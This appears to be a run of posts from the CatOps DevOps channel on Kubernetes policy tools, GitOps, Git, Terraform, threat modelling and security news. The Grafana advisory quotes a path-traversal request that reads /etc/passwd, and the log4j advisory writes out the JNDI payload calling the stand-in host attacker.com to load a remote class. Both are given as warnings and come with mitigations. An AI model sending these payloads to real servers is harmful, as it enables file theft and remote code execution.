CatOps
DevOps and other issues by Yurii Rochniak (@grem1in) - SRE @ Preply && Maksym Vlasov (@MaxymVlasov) - Engineer @ Star. Opinions are our own.

We do not post ads, including event announcements. Please do not bother us with such requests!
Some people tend to think that a job interview is a one-way street. Like an exam: there is a person or two asking questions to evaluate your skills, and you should excel at answering everything.

In reality, an interview is a bi-directional process. It is important for a company to hire matching talent, but it's no less important for an individual to find a matching company.

Here Gergely Orosz, the author of The Pragmatic Engineer blog, proposes a test to evaluate the engineering culture in a team (engineering culture may differ from team to team in large companies). The test consists of 12 questions, which you can ask at any stage of the interviewing process.

As a bonus, you can evaluate your current company as well!

#culture #hiring
I have already recommended CUE (or cuelang) in a few chats to validate Kubernetes manifests.

However, the language itself is capable of much more than just validating configuration files.

For example, you can write your configuration in CUE as well!

Here is a blog post that describes the basic concepts of the language as well as some real-world use cases.
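
For a taste of what that looks like, here is a minimal sketch in Go using CUE's Go API (cuelang.org/go). The schema and field names are made up for the example, so treat it as an illustration rather than a reference:

package main

import (
    "fmt"

    "cuelang.org/go/cue"
    "cuelang.org/go/cue/cuecontext"
)

func main() {
    ctx := cuecontext.New()

    // A tiny, made-up schema: replicas must be a positive integer,
    // image must be a non-empty string.
    schema := ctx.CompileString(`
        replicas: int & >0
        image:    string & !=""
    `)

    // The configuration to validate, written in CUE as well.
    config := ctx.CompileString(`
        replicas: 3
        image:    "nginx:1.21"
    `)

    // Unifying the config with the schema checks it against the constraints.
    if err := schema.Unify(config).Validate(cue.Concrete(true)); err != nil {
        fmt.Println("invalid config:", err)
        return
    }
    fmt.Println("config is valid")
}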

#cue #kubernetes
Some useful resources for Kubernetes CKA exam preparation:
- Kubectl Cheat Sheet for Kubernetes Admins & CKA Exam Prep
- Useful bookmarks (you are allowed to use these during the exam)
- Killer.sh - CKS, CKA, CKAD simulator

Good luck to those who are planning to take one of these exams!

#kubernetes #education
A nice overview of policy enforcement tools for Kubernetes by Viktor Farcic, comparing Gatekeeper (the OPA implementation for K8s) and Kyverno specifically.

tl;dr: Kyverno won this one.

However, I would like to add a few personal points in favor of Gatekeeper. The first important one - and Viktor mentions it as well - is that you can use OPA to enforce policies outside Kubernetes. For example, you can write policy checks for your Terraform code. Also, you can use something like Conftest to check your resources even before they are applied to a cluster!

Another important thing I want to point out is that Rego is a real programming language, even though not the most obvious one. You can write tests for your constraint templates, which is very powerful for keeping your policies in good shape. With Kyverno you have YAML, which is easier, but you still need to validate that YAML somehow, whereas with Rego you get tests out of the box. Here is a good article that helped me write tests for Rego back in the day.
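
To illustrate the point that Rego is usable outside of Kubernetes, here is a minimal sketch of evaluating a policy via OPA's Go SDK (github.com/open-policy-agent/opa/rego), using classic Rego syntax. The policy and input are made up for the example:

package main

import (
    "context"
    "fmt"
    "log"

    "github.com/open-policy-agent/opa/rego"
)

// A made-up policy: deny any resource that is not tagged with an owner.
const policy = `
package example

deny[msg] {
    not input.tags.owner
    msg := "resource must have an 'owner' tag"
}
`

func main() {
    ctx := context.Background()

    query, err := rego.New(
        rego.Query("data.example.deny"),
        rego.Module("example.rego", policy),
    ).PrepareForEval(ctx)
    if err != nil {
        log.Fatal(err)
    }

    // Pretend this is a parsed Terraform resource, a K8s manifest, etc.
    input := map[string]interface{}{
        "tags": map[string]interface{}{"env": "prod"},
    }

    results, err := query.Eval(ctx, rego.EvalInput(input))
    if err != nil {
        log.Fatal(err)
    }
    fmt.Println(results) // the deny message shows up in the result set
}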

#kubernetes #security #kyverno #opa #gatekeeper #rego
I have two book bundle recommendations today. I was wondering whether it makes sense to combine them into one message, but decided to post them separately.

So, the first one is a bundle of Python books by O'Reilly:
- Web Scraping with Python
- Test Driven Development with Python
- Using Asyncio in Python
- High Performance Python
- Introducing Python
- Think Python
- Hands-On Unsupervised Learning Using Python
- Python Data Science Handbook
- Thoughtful Machine Learning with Python
- Flask Web Development
- Machine Learning Pocket Reference
- Hitchhiker's Guide to Python
- Elegant SciPy
- NLP with Python

As usual, you can pay at least €15.55 to unlock all of these books or pay less to unlock some of them. There's no upper limit, though. You can pay whatever you want and Humble Bundle will redirect your funds to charity.

#books #python #programming
The next book bundle is about security.

- Microsoft Azure Security and Privacy Concepts
- Hack Yourself First: How to go on the Cyber-Offense
- Security in the Cloud
- Security Compliance: The Big Picture
- Security for Hackers and Developers: Overview
- Threats, Attacks, and Vulnerabilities for CompTIA Security+
- Incident Detection and Investigation with QRadar
- AWS Cloud Security Best Practices
- Microsoft 365 Security: Threat Protection Implementation and Management
- Cisco CyberOps: Security Monitoring
- Cloud Security: Introduction to Certified Cloud Security Professional (CCSP®)
- Linux Host Security
- Operationalizing Cyber Threat Intel: Pivoting & Hunting
- Security Awareness: Basic Concepts and Terminology
- Splunk Enterprise Security: Big Picture
- Threat Intelligence: Cyber Threats and Kill Chain Methodology
- Cyber Security Essentials: Your Role in Protecting the Company
- Security Management: A Case Study
- Security Awareness: Phishing - How Hackers Get Your Secrets
- Cyber Security Careers for IT Professionals

As usual, you can pay what you want. Minimum payment of €21.59 will unlock all 20 books.

#books #security
From our subscribers.

The CNCF Application Delivery Technical Advisory Group has released v1.0.0 of the GitOps specification.

You can find the specification itself on GitHub.

Basically, a GitOps system should comply with 4 main principles:
1. Declarative: A system managed by GitOps must have its desired state expressed declaratively.
2. Versioned and Immutable: Desired state is stored in a way that enforces immutability, versioning and retains a complete version history.
3. Pulled Automatically: Software agents automatically pull the desired state declarations from the source.
4. Continuously Reconciled: Software agents continuously observe the actual system state and attempt to apply the desired state.
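
To make the last principle a bit more concrete, here is a toy sketch of a reconciliation loop (not from the spec and not any particular agent's code; the functions are stand-ins):

package main

import (
    "fmt"
    "time"
)

// desiredState would normally be pulled from a Git repository;
// actualState would be observed from the live system (e.g. a cluster API).
// Both are hard-coded stand-ins for this sketch.
func fetchDesiredState() string  { return "replicas=3" }
func observeActualState() string { return "replicas=2" }
func apply(desired string)       { fmt.Println("applying:", desired) }

func main() {
    // Continuously observe the actual state and converge it
    // towards the declared desired state.
    for {
        desired := fetchDesiredState()
        actual := observeActualState()
        if desired != actual {
            apply(desired)
        }
        time.Sleep(30 * time.Second)
    }
}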

You could kind of deduce these principles already, but now they're formalized. Besides, you can adopt these principles - and, well, GitOps itself - not only for your services, but for IaC as well.

There are still open questions, for example, how to handle incidents in an immutable environment. However, I like the overall direction. Specifically, the point that even though we switched from "pet" servers to "cattle", we still treat environments as "pets", and we need to stop doing that.

I see the demand for running dynamic environments increasing across the industry. So, this is definitely a valid point and an interesting area to explore.

#gitops #cicd #culture
Our tech stacks differ from one company to another. However, there are certain things that almost everybody uses. Like, for example, Git!

Here are the release notes for Git 2.34.

This release introduces the use of the sparse index for some Git commands.

You can read more about sparse checkout and sparse index here.

This is especially useful for monorepo users. Although I haven't been working with one for more than two years now, I have some repos in mind where I would like to test it.

As a bonus: An article about Git's data structures and their behavior. Commits are not diffs, folks!

#git
Ship / Show / Ask - A modern branching strategy

It's a branching strategy that combines the features of Pull Requests with the ability to keep shipping changes.

Changes are categorized as either:

- Ship (merge into mainline without review)
- Show (open a pull request for review, but merge into mainline immediately)
- Ask (open a pull request for discussion before merging)

From CatOps Chat

#github
Our friends from Cossack Labs have released a new version of their Acra tool.

Acra is a database security suite for data protection. It provides application-level encryption for data fields, multi-layered access control, database leakage prevention, and intrusion detection capabilities in one suite. Acra was specifically designed for distributed apps (web, server-side, and mobile) that store data in one or many databases. Basically, you can encrypt individual fields in a way that is completely transparent to the application!

So, what's special about this release? A lot of features that were previously available only in the enterprise version have now made their way to open source! Among them: database encryption, searchable encryption, and an encryption-as-a-service API.

Apart from that, Acra allows you to tokenize certain fields in your database to achieve anonymization. This is actually a cool feature! In one of my former companies, we had to build our own tool for that. Here you get it as part of the package.
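
For those unfamiliar with the term, here is a toy sketch of what tokenization means in general. This is not Acra's API, just the concept: a sensitive value is swapped for a random token, and the real value is only recoverable through a separate, protected lookup.

package main

import (
    "crypto/rand"
    "encoding/hex"
    "fmt"
)

// A toy in-memory token vault. A real system keeps this mapping in
// protected storage and enforces access control around it.
var vault = map[string]string{}

// tokenize replaces a sensitive value with a random, meaningless token.
func tokenize(value string) (string, error) {
    buf := make([]byte, 16)
    if _, err := rand.Read(buf); err != nil {
        return "", err
    }
    token := hex.EncodeToString(buf)
    vault[token] = value
    return token, nil
}

// detokenize restores the original value for authorized callers.
func detokenize(token string) (string, bool) {
    value, ok := vault[token]
    return value, ok
}

func main() {
    token, _ := tokenize("4111 1111 1111 1111") // e.g. a card number
    fmt.Println("stored in the database:", token)

    original, _ := detokenize(token)
    fmt.Println("restored via the vault:", original)
}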

#security #databases #toolz
On our last voice chat we briefly discussed Kubernetes autoscaling and mentioned Karpenter - a cluster autoscaler backed by AWS.

This tool isn’t new. However, AWS has started to promote it recently, so it’s probably “production ready enough” in their judgment. Also, it looks like Karpenter can work with spot instances, which makes it a super interesting tool to follow.

You can read more about it in the AWS blog post.

If you are already using it or you have tried it, feel free to share your opinions in our chat!

#kubernetes #scaling #toolz
A short but insightful article by GitLab on how to perform threat modelling

It covers some basics like building diagrams, and describes the popular STRIDE framework for threat modelling.

STRIDE stands for:
- Spoofing - Impersonating something or someone else
- Tampering - Modifying data or code
- Repudiation - Claiming to have not performed an action
- Information disclosure - Exposing information to someone not authorized to see it
- Denial of service - Deny or degrade service to users
- Elevation of privilege - Gain capabilities without proper authorization

Here you can find a more detailed description of each area with some examples.

P.S. In general, GitLab has a lot of great documentation and blog posts freely available, not only on security and operational topics but on various aspects of work. I strongly suggest checking out their handbook. Maybe you can find guidance there on topics that are important to you at the moment.

#security
I'm a bit hesitant to post hot news, because there are usually people who do it faster than me.

This one is worth mentioning, though. Grafana fixed a 0-day vulnerability that was discovered yesterday.

The vulnerability in a nutshell, in case you've missed it: you were able to access restricted locations with a query like this one:
 /public/plugins/<PLUGIN>/../../../../../../../etc/passwd
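
If you are curious how this class of bug works, here is a tiny generic sketch in Go (not Grafana's actual code) of why naively joining a user-supplied path onto a base directory is dangerous:

package main

import (
    "fmt"
    "path/filepath"
    "strings"
)

func main() {
    base := "/var/lib/service/plugins" // made-up base directory
    userPath := "welcome/../../../../../../etc/passwd"

    // Naive join: ".." segments walk out of the base directory.
    resolved := filepath.Join(base, userPath)
    fmt.Println(resolved) // /etc/passwd

    // One common check: resolve the path and make sure it is still
    // inside the base directory before serving it.
    if !strings.HasPrefix(resolved, base+string(filepath.Separator)) {
        fmt.Println("rejected: path escapes the plugins directory")
    }
}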


Versions 8.3.1, 8.2.7, 8.1.8, and 8.0.7 were released recently and have a patch for this vulnerability. Make sure to upgrade!

#security
Astrologers have declared a week of application delivery.

So today, I want to share an article that touches on the problem of delivering infrastructure dependencies in the modern world.

The problem statement is that almost no application runs purely on its own, especially if we're talking about corporate backend services. These applications require databases, queues, blob storage, and many more dependencies to run correctly.

Who's responsible for that, though? Is it application developers? Well, in that case, they'll need to learn a bunch of things related to those topics, which likely doesn't make much sense from a business point of view. On the other hand, creating a separate team that provides dependencies on demand literally takes us a decade back to the "throwing code over the wall" and "ticket-based software delivery" approaches.

In this article, the author argues that bundling application dependencies alongside the codebase is the best way to go. One can have a team that delivers these building blocks, and a developer then combines them like Lego in their config files.

This is a very interesting approach (at least to me), and I truly believe it could be the next big thing in the DevOps-ish world. For now, the author mentions a few tools that could help here. However, in my humble opinion, the existing toolset is not quite there yet, and there is still a long way to go.

P.S. I wanted to write a real blog post on this topic as well. Unfortunately, I can't find the motivation. Therefore, I would rather create a series of small Telegram posts on this topic. Stay tuned!

#app_bundle #kubernetes #crossplane
Terraform 1.1.0 was released, and maybe the most interesting feature is the ability to force variables to be non-null:

# Non-nullable with a default: if left unset, or set explicitly to null,
# then it takes on the default value.
# In this case, the module author can safely assume var.e will never be null.
variable "e" {
  nullable = false
  default  = "hello"
}

# Non-nullable with no default: the variable must be set, and cannot be null.
# In this case, the module author can safely assume var.d will never be null.
variable "d" {
  nullable = false
}


By default, all variables are implicitly set to nullable = true.

#terraform
0-day vulnerability found in the popular Java log4j library.

Now, why is this important?

You may like Java or not, but it is a crazily popular programming language. Runs on billions of devices, bla-bla.

log4j is a very popular, if not the most popular, logging library for Java. If you have Java services in your landscape and they write logs, chances are high that they use log4j.

The exploit is stupidly simple. An attacker just needs a malicious server and arbitrary Java code that they want to execute on the victim's machine. Here's how it works:

1. Data from the User gets sent to the server (via any protocol),
2. The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server),
3. The log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI),
4. This response contains a path to a remote Java class file (e.g. https://second-stage.attacker.com/Exploit.class) which is injected into the server process,
5. This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.

It looks like the quickest mitigation is to set the -Dlog4j2.formatMsgNoLookups=true Java parameter for all your services if you're using log4j >= 2.10, or to reconfigure the JDK.

Also, check your Java services' logs. Maybe you are already compromised.

#security #0day
GitLab issued new security releases: 14.5.2, 14.4.4, and 14.3.6

These releases contain patches for various security vulnerabilities, including one with High severity.

So, if you're running your own GitLab Community Edition (CE) or Enterprise Edition (EE), make sure to upgrade!

#gitlab #security
Amazon has published a public postmortem for the recent issues on Friday. However, it went a little bit unnoticed because of the Log4j story (see one of the previous posts).

So, the original issue turned out to be a cascading failure, which led to congestion in AWS's internal network. This is the interesting part, because it sheds some light on AWS internals.

The internal monitoring system, as well as parts of the EC2 control plane, reside in that internal network, which experienced the issues. That's why the AWS team was operating with only partial visibility into their systems, which impacted the speed of resolution.

Customer workloads were still running, but their control APIs were impacted. For example, your existing EC2 machines were there, but you could neither describe them nor start new ones. This turned out to be more critical for certain AWS services like API Gateway and Amazon Connect.

The interesting thing is that these events were caused by code that had been there for years (according to AWS). Unfortunately, unexpected behavior was revealed during an automated scaling event.

To mitigate such issues in the future, AWS switched off the automatic scaling in us-east-1. They claim that they have enough capacity already. They're also working on a fix for the part of the code that caused the congestion in the first place. I assume there are many other internal action items from this outage as well.

#aws #postmortem